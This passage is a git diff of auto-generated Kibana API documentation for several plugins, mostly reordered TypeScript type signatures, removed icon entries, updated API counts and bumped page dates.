undefined; alert_counts?: Readonly<{ recovered?: string | number | undefined; active?: string | number | undefined; new?: string | number | undefined; } & {}> | undefined; number_of_searches?: string | number | undefined; total_indexing_duration_ms?: string | number | undefined; es_search_duration_ms?: string | number | undefined; total_search_duration_ms?: string | number | undefined; execution_gap_duration_s?: string | number | undefined; } & {}> | undefined; uuid?: string | undefined; status_order?: string | number | undefined; } & {}> | undefined; rule_type_id?: string | undefined; } & {}> | undefined; } & {}> | undefined; version?: string | undefined; alerting?: Readonly<{ status?: string | undefined; instance_id?: string | undefined; action_group_id?: string | undefined; action_subgroup?: string | undefined; } & {}> | undefined; server_uuid?: string | undefined; task?: Readonly<{ id?: string | undefined; schedule_delay?: string | number | undefined; scheduled?: string | undefined; } & {}> | undefined; saved_objects?: Readonly<{ type?: string | undefined; namespace?: string | undefined; id?: string | undefined; rel?: string | undefined; type_id?: string | undefined; } & {}>[] | undefined; space_ids?: string[] | undefined; } & {}> | undefined; ecs?: Readonly<{ version?: string | undefined; } & {}> | undefined; rule?: Readonly<{ id?: string | undefined; description?: string | undefined; name?: string | undefined; version?: string | undefined; license?: string | undefined; category?: string | undefined; reference?: string | undefined; author?: string[] | undefined; ruleset?: string | undefined; uuid?: string | undefined; } & {}> | undefined; event?: Readonly<{ start?: string | undefined; type?: string[] | undefined; id?: string | undefined; outcome?: string | undefined; created?: string | undefined; category?: string[] | undefined; end?: string | undefined; original?: string | undefined; duration?: string | number | undefined; code?: string | undefined; url?: 
string | undefined; action?: string | undefined; kind?: string | undefined; hash?: string | undefined; severity?: string | number | undefined; dataset?: string | undefined; ingested?: string | undefined; module?: string | undefined; provider?: string | undefined; reason?: string | undefined; reference?: string | undefined; risk_score?: number | undefined; risk_score_norm?: number | undefined; sequence?: string | number | undefined; timezone?: string | undefined; } & {}> | undefined; '@timestamp'?: string | undefined; } & {}> | undefined)[]" ], "path": "x-pack/plugins/event_log/server/es/cluster_client_adapter.ts", "deprecated": false 
@@ -1142,7 +1142,7 @@ "label": "IEvent", "description": [], "signature": [ - "DeepPartial | undefined; log?: Readonly<{ logger?: string | undefined; level?: string | undefined; } & {}> | undefined; user?: Readonly<{ name?: string | undefined; } & {}> | undefined; message?: string | undefined; tags?: string[] | undefined; kibana?: Readonly<{ version?: string | undefined; alert?: Readonly<{ rule?: Readonly<{ consumer?: string | undefined; execution?: Readonly<{ status?: string | undefined; metrics?: Readonly<{ number_of_triggered_actions?: string | number | undefined; number_of_generated_actions?: string | number | undefined; alert_counts?: Readonly<{ recovered?: string | number | undefined; active?: string | number | undefined; new?: string | number | undefined; } & {}> | undefined; number_of_searches?: string | number | undefined; total_indexing_duration_ms?: string | number | undefined; es_search_duration_ms?: string | number | undefined; total_search_duration_ms?: string | number | undefined; execution_gap_duration_s?: string | number | undefined; } & {}> | undefined; uuid?: string | undefined; status_order?: string | number | undefined; } & {}> | undefined; rule_type_id?: string | undefined; } & {}> | undefined; } & {}> | undefined; alerting?: Readonly<{ status?: string | undefined; instance_id?: string | undefined; action_group_id?: string | undefined; action_subgroup?: string | undefined; } & {}> | undefined; server_uuid?: string | undefined; task?: Readonly<{ id?: string | undefined; schedule_delay?: string | number | undefined; scheduled?: string | undefined; } & {}> | undefined; saved_objects?: Readonly<{ type?: string | undefined; id?: string | undefined; namespace?: string | undefined; rel?: string | undefined; type_id?: string | undefined; } & {}>[] | undefined; space_ids?: string[] | undefined; } & {}> | undefined; ecs?: Readonly<{ version?: string | undefined; } & {}> | undefined; rule?: Readonly<{ id?: string | undefined; name?: string | undefined; 
version?: string | undefined; description?: string | undefined; license?: string | undefined; category?: string | undefined; reference?: string | undefined; author?: string[] | undefined; ruleset?: string | undefined; uuid?: string | undefined; } & {}> | undefined; event?: Readonly<{ start?: string | undefined; type?: string[] | undefined; id?: string | undefined; end?: string | undefined; original?: string | undefined; outcome?: string | undefined; created?: string | undefined; category?: string[] | undefined; duration?: string | number | undefined; code?: string | undefined; url?: string | undefined; action?: string | undefined; kind?: string | undefined; hash?: string | undefined; severity?: string | number | undefined; dataset?: string | undefined; ingested?: string | undefined; module?: string | undefined; provider?: string | undefined; reason?: string | undefined; reference?: string | undefined; risk_score?: number | undefined; risk_score_norm?: number | undefined; sequence?: string | number | undefined; timezone?: string | undefined; } & {}> | undefined; '@timestamp'?: string | undefined; } & {}>>> | undefined" + "DeepPartial | undefined; tags?: string[] | undefined; log?: Readonly<{ logger?: string | undefined; level?: string | undefined; } & {}> | undefined; user?: Readonly<{ name?: string | undefined; } & {}> | undefined; message?: string | undefined; kibana?: Readonly<{ alert?: Readonly<{ rule?: Readonly<{ consumer?: string | undefined; execution?: Readonly<{ status?: string | undefined; metrics?: Readonly<{ number_of_triggered_actions?: string | number | undefined; number_of_generated_actions?: string | number | undefined; alert_counts?: Readonly<{ recovered?: string | number | undefined; active?: string | number | undefined; new?: string | number | undefined; } & {}> | undefined; number_of_searches?: string | number | undefined; total_indexing_duration_ms?: string | number | undefined; es_search_duration_ms?: string | number | undefined; 
total_search_duration_ms?: string | number | undefined; execution_gap_duration_s?: string | number | undefined; } & {}> | undefined; uuid?: string | undefined; status_order?: string | number | undefined; } & {}> | undefined; rule_type_id?: string | undefined; } & {}> | undefined; } & {}> | undefined; version?: string | undefined; alerting?: Readonly<{ status?: string | undefined; instance_id?: string | undefined; action_group_id?: string | undefined; action_subgroup?: string | undefined; } & {}> | undefined; server_uuid?: string | undefined; task?: Readonly<{ id?: string | undefined; schedule_delay?: string | number | undefined; scheduled?: string | undefined; } & {}> | undefined; saved_objects?: Readonly<{ type?: string | undefined; namespace?: string | undefined; id?: string | undefined; rel?: string | undefined; type_id?: string | undefined; } & {}>[] | undefined; space_ids?: string[] | undefined; } & {}> | undefined; ecs?: Readonly<{ version?: string | undefined; } & {}> | undefined; rule?: Readonly<{ id?: string | undefined; description?: string | undefined; name?: string | undefined; version?: string | undefined; license?: string | undefined; category?: string | undefined; reference?: string | undefined; author?: string[] | undefined; ruleset?: string | undefined; uuid?: string | undefined; } & {}> | undefined; event?: Readonly<{ start?: string | undefined; type?: string[] | undefined; id?: string | undefined; outcome?: string | undefined; created?: string | undefined; category?: string[] | undefined; end?: string | undefined; original?: string | undefined; duration?: string | number | undefined; code?: string | undefined; url?: string | undefined; action?: string | undefined; kind?: string | undefined; hash?: string | undefined; severity?: string | number | undefined; dataset?: string | undefined; ingested?: string | undefined; module?: string | undefined; provider?: string | undefined; reason?: string | undefined; reference?: string | undefined; 
risk_score?: number | undefined; risk_score_norm?: number | undefined; sequence?: string | number | undefined; timezone?: string | undefined; } & {}> | undefined; '@timestamp'?: string | undefined; } & {}>>> | undefined" ], "path": "x-pack/plugins/event_log/generated/schemas.ts", "deprecated": false, 
@@ -1156,7 +1156,7 @@ "label": "IValidatedEvent", "description": [], "signature": [ - "Readonly<{ error?: Readonly<{ type?: string | undefined; id?: string | undefined; message?: string | undefined; code?: string | undefined; stack_trace?: string | undefined; } & {}> | undefined; log?: Readonly<{ logger?: string | undefined; level?: string | undefined; } & {}> | undefined; user?: Readonly<{ name?: string | undefined; } & {}> | undefined; message?: string | undefined; tags?: string[] | undefined; kibana?: Readonly<{ version?: string | undefined; alert?: Readonly<{ rule?: Readonly<{ consumer?: string | undefined; execution?: Readonly<{ status?: string | undefined; metrics?: Readonly<{ number_of_triggered_actions?: string | number | undefined; number_of_generated_actions?: string | number | undefined; alert_counts?: Readonly<{ recovered?: string | number | undefined; active?: string | number | undefined; new?: string | number | undefined; } & {}> | undefined; number_of_searches?: string | number | undefined; total_indexing_duration_ms?: string | number | undefined; es_search_duration_ms?: string | number | undefined; total_search_duration_ms?: string | number | undefined; execution_gap_duration_s?: string | number | undefined; } & {}> | undefined; uuid?: string | undefined; status_order?: string | number | undefined; } & {}> | undefined; rule_type_id?: string | undefined; } & {}> | undefined; } & {}> | undefined; alerting?: Readonly<{ status?: string | undefined; instance_id?: string | undefined; action_group_id?: string | undefined; action_subgroup?: string | undefined; } & {}> | undefined; server_uuid?: string | undefined; task?: Readonly<{ id?: string | undefined; schedule_delay?: string | number | undefined; scheduled?: string | undefined; } & {}> | undefined; saved_objects?: Readonly<{ type?: string | undefined; id?: string | undefined; namespace?: string | undefined; rel?: string | undefined; type_id?: string | undefined; } & {}>[] | undefined; space_ids?: 
string[] | undefined; } & {}> | undefined; ecs?: Readonly<{ version?: string | undefined; } & {}> | undefined; rule?: Readonly<{ id?: string | undefined; name?: string | undefined; version?: string | undefined; description?: string | undefined; license?: string | undefined; category?: string | undefined; reference?: string | undefined; author?: string[] | undefined; ruleset?: string | undefined; uuid?: string | undefined; } & {}> | undefined; event?: Readonly<{ start?: string | undefined; type?: string[] | undefined; id?: string | undefined; end?: string | undefined; original?: string | undefined; outcome?: string | undefined; created?: string | undefined; category?: string[] | undefined; duration?: string | number | undefined; code?: string | undefined; url?: string | undefined; action?: string | undefined; kind?: string | undefined; hash?: string | undefined; severity?: string | number | undefined; dataset?: string | undefined; ingested?: string | undefined; module?: string | undefined; provider?: string | undefined; reason?: string | undefined; reference?: string | undefined; risk_score?: number | undefined; risk_score_norm?: number | undefined; sequence?: string | number | undefined; timezone?: string | undefined; } & {}> | undefined; '@timestamp'?: string | undefined; } & {}> | undefined" + "Readonly<{ error?: Readonly<{ type?: string | undefined; message?: string | undefined; id?: string | undefined; code?: string | undefined; stack_trace?: string | undefined; } & {}> | undefined; tags?: string[] | undefined; log?: Readonly<{ logger?: string | undefined; level?: string | undefined; } & {}> | undefined; user?: Readonly<{ name?: string | undefined; } & {}> | undefined; message?: string | undefined; kibana?: Readonly<{ alert?: Readonly<{ rule?: Readonly<{ consumer?: string | undefined; execution?: Readonly<{ status?: string | undefined; metrics?: Readonly<{ number_of_triggered_actions?: string | number | undefined; number_of_generated_actions?: string | number | 
undefined; alert_counts?: Readonly<{ recovered?: string | number | undefined; active?: string | number | undefined; new?: string | number | undefined; } & {}> | undefined; number_of_searches?: string | number | undefined; total_indexing_duration_ms?: string | number | undefined; es_search_duration_ms?: string | number | undefined; total_search_duration_ms?: string | number | undefined; execution_gap_duration_s?: string | number | undefined; } & {}> | undefined; uuid?: string | undefined; status_order?: string | number | undefined; } & {}> | undefined; rule_type_id?: string | undefined; } & {}> | undefined; } & {}> | undefined; version?: string | undefined; alerting?: Readonly<{ status?: string | undefined; instance_id?: string | undefined; action_group_id?: string | undefined; action_subgroup?: string | undefined; } & {}> | undefined; server_uuid?: string | undefined; task?: Readonly<{ id?: string | undefined; schedule_delay?: string | number | undefined; scheduled?: string | undefined; } & {}> | undefined; saved_objects?: Readonly<{ type?: string | undefined; namespace?: string | undefined; id?: string | undefined; rel?: string | undefined; type_id?: string | undefined; } & {}>[] | undefined; space_ids?: string[] | undefined; } & {}> | undefined; ecs?: Readonly<{ version?: string | undefined; } & {}> | undefined; rule?: Readonly<{ id?: string | undefined; description?: string | undefined; name?: string | undefined; version?: string | undefined; license?: string | undefined; category?: string | undefined; reference?: string | undefined; author?: string[] | undefined; ruleset?: string | undefined; uuid?: string | undefined; } & {}> | undefined; event?: Readonly<{ start?: string | undefined; type?: string[] | undefined; id?: string | undefined; outcome?: string | undefined; created?: string | undefined; category?: string[] | undefined; end?: string | undefined; original?: string | undefined; duration?: string | number | undefined; code?: string | undefined; url?: 
string | undefined; action?: string | undefined; kind?: string | undefined; hash?: string | undefined; severity?: string | number | undefined; dataset?: string | undefined; ingested?: string | undefined; module?: string | undefined; provider?: string | undefined; reason?: string | undefined; reference?: string | undefined; risk_score?: number | undefined; risk_score_norm?: number | undefined; sequence?: string | number | undefined; timezone?: string | undefined; } & {}> | undefined; '@timestamp'?: string | undefined; } & {}> | undefined" ], "path": "x-pack/plugins/event_log/generated/schemas.ts", "deprecated": false, diff --git a/api_docs/event_log.mdx b/api_docs/event_log.mdx index 508c23c296a42..08e0efb364837 100644 --- a/api_docs/event_log.mdx +++ b/api_docs/event_log.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/eventLog title: "eventLog" image: https://source.unsplash.com/400x175/?github description: API docs for the eventLog plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'eventLog'] --- import eventLogObj from './event_log.devdocs.json'; diff --git a/api_docs/expression_error.mdx b/api_docs/expression_error.mdx index 9512c20b14b80..68db5de55f03b 100644 --- a/api_docs/expression_error.mdx +++ b/api_docs/expression_error.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionError title: "expressionError" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionError plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionError'] --- import expressionErrorObj from './expression_error.devdocs.json'; diff --git a/api_docs/expression_gauge.devdocs.json b/api_docs/expression_gauge.devdocs.json index f40fb1a95cd51..67065298ff9a6 100644 --- a/api_docs/expression_gauge.devdocs.json +++ b/api_docs/expression_gauge.devdocs.json 
@@ -349,76 +349,6 @@ ], "returnComment": [], "initialIsOpen": false - }, - { - "parentPluginId": "expressionGauge", - "id": "def-public.HorizontalBulletIcon", - "type": "Function", - "tags": [], - "label": "HorizontalBulletIcon", - "description": [], - "signature": [ - "({ title, titleId, ...props }: Omit<", - "EuiIconProps", - ", \"type\">) => JSX.Element" - ], - "path": "src/plugins/chart_expressions/expression_gauge/public/components/icons/horizontal_bullet_icon.tsx", - "deprecated": false, - "children": [ - { - "parentPluginId": "expressionGauge", - "id": "def-public.HorizontalBulletIcon.$1", - "type": "Object", - "tags": [], - "label": "{ title, titleId, ...props }", - "description": [], - "signature": [ - "Omit<", - "EuiIconProps", - ", \"type\">" - ], - "path": "src/plugins/chart_expressions/expression_gauge/public/components/icons/horizontal_bullet_icon.tsx", - "deprecated": false, - "isRequired": true - } - ], - "returnComment": [], - "initialIsOpen": false - }, - { - "parentPluginId": "expressionGauge", - "id": "def-public.VerticalBulletIcon", - "type": "Function", - "tags": [], - "label": "VerticalBulletIcon", - "description": [], - "signature": [ - "({ title, titleId, ...props }: Omit<", - "EuiIconProps", - ", \"type\">) => JSX.Element" - ], - "path": "src/plugins/chart_expressions/expression_gauge/public/components/icons/vertical_bullet_icon.tsx", - "deprecated": false, - "children": [ - { - "parentPluginId": "expressionGauge", - "id": "def-public.VerticalBulletIcon.$1", - "type": "Object", - "tags": [], - "label": "{ title, titleId, ...props }", - "description": [], - "signature": [ - "Omit<", - "EuiIconProps", - ", \"type\">" - ], - "path": "src/plugins/chart_expressions/expression_gauge/public/components/icons/vertical_bullet_icon.tsx", - "deprecated": false, - "isRequired": true - } - ], - "returnComment": [], - "initialIsOpen": false } ], "interfaces": [], 
diff --git a/api_docs/expression_gauge.mdx b/api_docs/expression_gauge.mdx index c0af29a90a4da..f512e7e9c75f3 100644 --- a/api_docs/expression_gauge.mdx +++ b/api_docs/expression_gauge.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionGauge title: "expressionGauge" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionGauge plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionGauge'] --- import expressionGaugeObj from './expression_gauge.devdocs.json'; @@ -21,7 +21,7 @@ Contact [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Public API count | Any count | Items lacking comments | Missing exports | |-------------------|-----------|------------------------|-----------------| -| 61 | 0 | 61 | 2 | +| 57 | 0 | 57 | 2 | ## Client diff --git a/api_docs/expression_heatmap.devdocs.json b/api_docs/expression_heatmap.devdocs.json index 6cc1961115e4e..2838d206d03a2 100644 --- a/api_docs/expression_heatmap.devdocs.json +++ b/api_docs/expression_heatmap.devdocs.json 
@@ -2,43 +2,7 @@ "id": "expressionHeatmap", "client": { "classes": [], - "functions": [ - { - "parentPluginId": "expressionHeatmap", - "id": "def-public.HeatmapIcon", - "type": "Function", - "tags": [], - "label": "HeatmapIcon", - "description": [], - "signature": [ - "({ title, titleId, ...props }: Omit<", - "EuiIconProps", - ", \"type\">) => JSX.Element" - ], - "path": "src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_icon.tsx", - "deprecated": false, - "children": [ - { - "parentPluginId": "expressionHeatmap", - "id": "def-public.HeatmapIcon.$1", - "type": "Object", - "tags": [], - "label": "{ title, titleId, ...props }", - "description": [], - "signature": [ - "Omit<", - "EuiIconProps", - ", \"type\">" - ], - "path": "src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_icon.tsx", - "deprecated": false, - "isRequired": true - } - ], - "returnComment": [], - "initialIsOpen": false - } - ], + "functions": [], "interfaces": [], "enums": [], "misc": [], diff --git a/api_docs/expression_heatmap.mdx b/api_docs/expression_heatmap.mdx index cbc67c918cc69..040edccf8c8c3 100644 --- a/api_docs/expression_heatmap.mdx +++ b/api_docs/expression_heatmap.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionHeatmap title: "expressionHeatmap" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionHeatmap plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionHeatmap'] --- import expressionHeatmapObj from './expression_heatmap.devdocs.json'; @@ -21,12 +21,7 @@ Contact [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Public API count | Any count | Items lacking comments | Missing exports | |-------------------|-----------|------------------------|-----------------| -| 107 | 0 | 103 | 3 | - -## Client - -### Functions - +| 105 | 0 | 101 | 3 | ## Common 
diff --git a/api_docs/expression_image.mdx b/api_docs/expression_image.mdx index 8c5d6c7de9f93..0d8b0cff8abb8 100644 --- a/api_docs/expression_image.mdx +++ b/api_docs/expression_image.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionImage title: "expressionImage" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionImage plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionImage'] --- import expressionImageObj from './expression_image.devdocs.json'; diff --git a/api_docs/expression_legacy_metric_vis.mdx b/api_docs/expression_legacy_metric_vis.mdx index 202fc360454ec..70526268ccb40 100644 --- a/api_docs/expression_legacy_metric_vis.mdx +++ b/api_docs/expression_legacy_metric_vis.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionLegacyMetricVis title: "expressionLegacyMetricVis" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionLegacyMetricVis plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionLegacyMetricVis'] --- import expressionLegacyMetricVisObj from './expression_legacy_metric_vis.devdocs.json'; diff --git a/api_docs/expression_metric.mdx b/api_docs/expression_metric.mdx index 5f0bb86d8a703..bb29f3d63221b 100644 --- a/api_docs/expression_metric.mdx +++ b/api_docs/expression_metric.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionMetric title: "expressionMetric" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionMetric plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionMetric'] --- import expressionMetricObj from './expression_metric.devdocs.json'; diff --git a/api_docs/expression_metric_vis.mdx b/api_docs/expression_metric_vis.mdx index 472c0353c2752..71ac4a737f38d 100644 --- a/api_docs/expression_metric_vis.mdx +++ b/api_docs/expression_metric_vis.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionMetricVis title: "expressionMetricVis" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionMetricVis plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionMetricVis'] --- import expressionMetricVisObj from './expression_metric_vis.devdocs.json'; diff --git a/api_docs/expression_partition_vis.mdx b/api_docs/expression_partition_vis.mdx index 3a2b6ea812e19..3bcf859578437 100644 --- a/api_docs/expression_partition_vis.mdx +++ b/api_docs/expression_partition_vis.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionPartitionVis title: "expressionPartitionVis" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionPartitionVis plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionPartitionVis'] --- import expressionPartitionVisObj from './expression_partition_vis.devdocs.json'; diff --git a/api_docs/expression_repeat_image.mdx b/api_docs/expression_repeat_image.mdx index 0d78383e9904f..fb5c7b545999b 100644 --- a/api_docs/expression_repeat_image.mdx +++ b/api_docs/expression_repeat_image.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionRepeatImage title: "expressionRepeatImage" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionRepeatImage plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionRepeatImage'] --- import expressionRepeatImageObj from './expression_repeat_image.devdocs.json'; diff --git a/api_docs/expression_reveal_image.mdx b/api_docs/expression_reveal_image.mdx index 259d840665074..b6c9983a9988c 100644 --- a/api_docs/expression_reveal_image.mdx +++ b/api_docs/expression_reveal_image.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionRevealImage title: "expressionRevealImage" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionRevealImage plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionRevealImage'] --- import expressionRevealImageObj from './expression_reveal_image.devdocs.json'; diff --git a/api_docs/expression_shape.devdocs.json b/api_docs/expression_shape.devdocs.json index 5cb96923eb878..efd37d1f3b4d0 100644 --- a/api_docs/expression_shape.devdocs.json +++ b/api_docs/expression_shape.devdocs.json @@ -612,7 +612,7 @@ "label": "strokeLinecap", "description": [], "signature": [ - "\"inherit\" | \"butt\" | \"round\" | \"square\" | undefined" + "\"butt\" | \"round\" | \"square\" | \"inherit\" | undefined" ], "path": "src/plugins/expression_shape/public/components/reusable/types.tsx", "deprecated": false @@ -651,7 +651,7 @@ "label": "strokeLinejoin", "description": [], "signature": [ - "\"inherit\" | \"round\" | \"miter\" | \"bevel\" | undefined" + "\"round\" | \"inherit\" | \"miter\" | \"bevel\" | undefined" ], "path": "src/plugins/expression_shape/public/components/reusable/types.tsx", "deprecated": false diff --git a/api_docs/expression_shape.mdx b/api_docs/expression_shape.mdx index 027f8760b20ab..971bc703be0e2 100644 --- a/api_docs/expression_shape.mdx +++ b/api_docs/expression_shape.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionShape title: "expressionShape" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionShape plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionShape'] --- import expressionShapeObj from './expression_shape.devdocs.json'; diff --git a/api_docs/expression_tagcloud.mdx b/api_docs/expression_tagcloud.mdx index fc8400c145fd5..0e5302d87a970 100644 --- a/api_docs/expression_tagcloud.mdx +++ b/api_docs/expression_tagcloud.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionTagcloud title: "expressionTagcloud" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionTagcloud plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionTagcloud'] --- import expressionTagcloudObj from './expression_tagcloud.devdocs.json'; diff --git a/api_docs/expression_x_y.devdocs.json b/api_docs/expression_x_y.devdocs.json index b1000cda6f9a8..a5afbe5ba1914 100644 --- a/api_docs/expression_x_y.devdocs.json +++ b/api_docs/expression_x_y.devdocs.json @@ -721,7 +721,7 @@ "label": "xScaleType", "description": [], "signature": [ - "\"time\" | \"linear\" | \"ordinal\"" + "\"linear\" | \"time\" | \"ordinal\"" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", "deprecated": false @@ -788,7 +788,13 @@ "label": "decorations", "description": [], "signature": [ - "DataDecorationConfigResult", + { + "pluginId": "expressionXY", + "scope": "common", + "docId": "kibExpressionXYPluginApi", + "section": "def-common.DataDecorationConfigResult", + "text": "DataDecorationConfigResult" + }, "[] | undefined" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", @@ -1807,7 +1813,7 @@ "label": "AvailableReferenceLineIcon", "description": [], "signature": [ - "\"alert\" | \"circle\" | \"asterisk\" | \"bell\" | \"bolt\" | \"bug\" | \"editorComment\" | \"flag\" | \"heart\" | \"mapMarker\" | \"pinFilled\" | \"starEmpty\" | \"tag\" | \"triangle\" | \"empty\"" + "\"circle\" | \"asterisk\" | \"alert\" | \"bell\" | \"bolt\" | \"bug\" | \"editorComment\" | \"flag\" | \"heart\" | \"mapMarker\" | \"pinFilled\" | \"starEmpty\" | \"tag\" | \"triangle\" | \"empty\"" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", "deprecated": false, 
@@ -2008,6 +2014,27 @@ "deprecated": false, "initialIsOpen": false }, + { + "parentPluginId": "expressionXY", + "id": "def-common.DataDecorationConfigResult", + "type": "Type", + "tags": [], + "label": "DataDecorationConfigResult", + "description": [], + "signature": [ + { + "pluginId": "expressionXY", + "scope": "common", + "docId": "kibExpressionXYPluginApi", + "section": "def-common.DataDecorationConfig", + "text": "DataDecorationConfig" + }, + " & { type: \"dataDecorationConfig\"; }" + ], + "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", + "deprecated": false, + "initialIsOpen": false + }, { "parentPluginId": "expressionXY", "id": "def-common.DataLayerConfig", @@ -2369,7 +2396,7 @@ "label": "XScaleType", "description": [], "signature": [ - "\"time\" | \"linear\" | \"ordinal\"" + "\"linear\" | \"time\" | \"ordinal\"" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", "deprecated": false, @@ -2480,7 +2507,7 @@ "label": "YScaleType", "description": [], "signature": [ - "\"log\" | \"time\" | \"linear\" | \"sqrt\"" + "\"linear\" | \"log\" | \"time\" | \"sqrt\"" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", "deprecated": false, diff --git a/api_docs/expression_x_y.mdx b/api_docs/expression_x_y.mdx index 195f9ce08b2e2..fa81ffc3ef6ba 100644 --- a/api_docs/expression_x_y.mdx +++ b/api_docs/expression_x_y.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionXY title: "expressionXY" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionXY plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionXY'] --- import expressionXYObj from './expression_x_y.devdocs.json'; 
@@ -21,7 +21,7 @@ Contact [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Public API count | Any count | Items lacking comments | Missing exports | |-------------------|-----------|------------------------|-----------------| -| 151 | 0 | 141 | 12 | +| 152 | 0 | 142 | 11 | ## Client diff --git a/api_docs/expressions.devdocs.json b/api_docs/expressions.devdocs.json index aeff5f00d09e2..8bf0ad4f7cc46 100644 --- a/api_docs/expressions.devdocs.json +++ b/api_docs/expressions.devdocs.json @@ -6980,7 +6980,7 @@ "\nTracks state of execution.\n\n- `not-started` - before .start() method was called.\n- `pending` - immediately after .start() method is called.\n- `result` - when expression execution completed.\n- `error` - when execution failed with error." ], "signature": [ - "\"error\" | \"result\" | \"not-started\" | \"pending\"" + "\"error\" | \"not-started\" | \"pending\" | \"result\"" ], "path": "src/plugins/expressions/common/execution/container.ts", "deprecated": false @@ -10800,7 +10800,7 @@ "label": "padding", "description": [], "signature": [ - "\"s\" | \"m\" | \"l\" | \"xl\" | \"xs\" | undefined" + "\"m\" | \"s\" | \"xs\" | \"l\" | \"xl\" | undefined" ], "path": "src/plugins/expressions/public/react_expression_renderer/react_expression_renderer.tsx", "deprecated": false @@ -11601,7 +11601,7 @@ "\nAllowed column names in a PointSeries" ], "signature": [ - "\"color\" | \"size\" | \"x\" | \"y\" | \"text\"" + "\"color\" | \"size\" | \"text\" | \"y\" | \"x\"" ], "path": "src/plugins/expressions/common/expression_types/specs/pointseries.ts", "deprecated": false, @@ -11784,7 +11784,7 @@ "\nTypes used in Expressions that don't map to a primitive cleanly:\n\n`date` is typed as a number or string, and represents a date" ], "signature": [ - "\"filter\" | \"date\"" + "\"date\" | \"filter\"" ], "path": "src/plugins/expressions/common/types/common.ts", "deprecated": false, 
@@ -17447,7 +17447,7 @@ "\nTracks state of execution.\n\n- `not-started` - before .start() method was called.\n- `pending` - immediately after .start() method is called.\n- `result` - when expression execution completed.\n- `error` - when execution failed with error." ], "signature": [ - "\"error\" | \"result\" | \"not-started\" | \"pending\"" + "\"error\" | \"not-started\" | \"pending\" | \"result\"" ], "path": "src/plugins/expressions/common/execution/container.ts", "deprecated": false @@ -20629,7 +20629,7 @@ "\nAllowed column names in a PointSeries" ], "signature": [ - "\"color\" | \"size\" | \"x\" | \"y\" | \"text\"" + "\"color\" | \"size\" | \"text\" | \"y\" | \"x\"" ], "path": "src/plugins/expressions/common/expression_types/specs/pointseries.ts", "deprecated": false, @@ -20782,7 +20782,7 @@ "\nTypes used in Expressions that don't map to a primitive cleanly:\n\n`date` is typed as a number or string, and represents a date" ], "signature": [ - "\"filter\" | \"date\"" + "\"date\" | \"filter\"" ], "path": "src/plugins/expressions/common/types/common.ts", "deprecated": false, @@ -28783,7 +28783,7 @@ "\nTracks state of execution.\n\n- `not-started` - before .start() method was called.\n- `pending` - immediately after .start() method is called.\n- `result` - when expression execution completed.\n- `error` - when execution failed with error." ], "signature": [ - "\"error\" | \"result\" | \"not-started\" | \"pending\"" + "\"error\" | \"not-started\" | \"pending\" | \"result\"" ], "path": 